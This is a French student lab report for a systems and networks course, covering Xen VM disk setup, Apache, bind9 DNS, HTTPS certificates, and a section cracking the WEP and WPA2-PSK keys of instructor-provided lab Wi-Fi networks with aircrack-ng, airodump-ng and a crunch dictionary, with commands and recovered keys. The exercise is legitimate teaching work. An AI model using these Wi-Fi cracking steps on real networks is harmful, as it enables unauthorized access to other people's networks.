     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
